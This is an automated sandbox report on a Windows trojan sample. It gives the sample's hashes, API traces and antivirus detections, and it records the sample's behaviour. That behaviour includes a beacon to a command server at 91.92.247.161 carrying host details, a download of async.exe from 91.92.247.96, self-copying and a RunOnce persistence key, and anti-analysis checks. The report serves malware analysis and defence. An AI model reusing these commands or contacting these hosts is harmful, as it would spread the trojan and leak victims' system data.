Summary | ZeroBOX

Application.exe

Malicious Library UPX PE File OS Processor Check PE32 .NET EXE
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 7, 2023, 11:35 a.m. Dec. 7, 2023, 11:46 a.m.
Size 285.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3ba788943ce69ebe9bbd218606fd8547
SHA256 13f53967b03017371c9385a4266b5f3169afe48e933a5cbbf95f24843c05f376
CRC32 CFB4A7D5
ssdeep 6144:xOsvv2XehpGU3HufTii8q0xH9h6edHyQYQFRkVli17iJiy8BNg2AOxT4hR:9BHL6edHytQEiy8BNg2khR
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
91.92.247.161 Active Moloch
91.92.247.96 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x0000000000000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001af1eb50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 8
1 1 0

CryptExportKey

buffer: f Aq‚ºbVÙ œÎÍ Œb“R¦›êNÔþ1«·†£
crypto_handle: 0x000000001af1eb50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 8
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.96/async.exe
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29
request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
request GET http://91.92.247.96/async.exe
request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 2424832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000ac0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d61000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef33fb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000700000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9365c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description gfsvc.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
description Application.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
cmdline cmd.exe /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
cmdline "C:\Windows\System32\cmd.exe" /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
wmi SELECT * FROM Win32_Processor
wmi SELECT * FROM Win32_BaseBoard
wmi SELECT * FROM Win32_DiskDrive
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: <binary data omitted>
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2400
process_handle: 0x000000000000037c
0 0
cmdline cmd.exe /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
cmdline ping 1.1.1.1
cmdline "C:\Windows\System32\cmd.exe" /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
wmi SELECT * FROM Win32_Processor
buffer Buffer with sha1: 75416d4212b2f460ecf7209bf89016ed60030d8c
host 91.92.247.161
host 91.92.247.96
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SystemBiosVersion
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Service Scheduler reg_value "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
file C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst
process gfsvc.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process gfsvc.exe useragent curl/1.0
Bkav W32.AIDetectMalware
MicroWorld-eScan Gen:Trojan.Heur.RP.ruW@bSJZebei
Skyhigh BehavesLike.Win32.AdwareLinkury.dh
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta AI:Packer.5FB5ACF81F
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky HEUR:Trojan.Win32.Agent.gen
BitDefender Gen:Trojan.Heur.RP.ruW@bSJZebei
Avast FileRepMalware [Rat]
Emsisoft Gen:Trojan.Heur.RP.ruW@bSJZebei (B)
F-Secure Heuristic.HEUR/AGEN.1319014
VIPRE Gen:Trojan.Heur.RP.ruW@bSJZebei
TrendMicro TROJ_GEN.R06CC0XL623
Trapmine suspicious.low.ml.score
FireEye Generic.mg.3ba788943ce69ebe
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Avira HEUR/AGEN.1319014
MAX malware (ai score=82)
Kingsoft malware.kb.a.931
Microsoft Trojan:Win32/Wacatac.B!ml
Arcabit Trojan.Heur.RP.EA82A9
ZoneAlarm UDS:Trojan.Win32.Agent.gen
GData Gen:Trojan.Heur.RP.ruW@bSJZebei
VBA32 BScope.Trojan.Wacatac
ALYac Gen:Trojan.Heur.RP.ruW@bSJZebei
Cylance unsafe
Rising Trojan.Generic@AI.98 (RDML:k/ViMpBtJGzyRg1BpQ/bJg)
MaxSecure Trojan.Malware.300983.susgen
AVG FileRepMalware [Rat]
Cybereason malicious.f63d4b
DeepInstinct MALICIOUS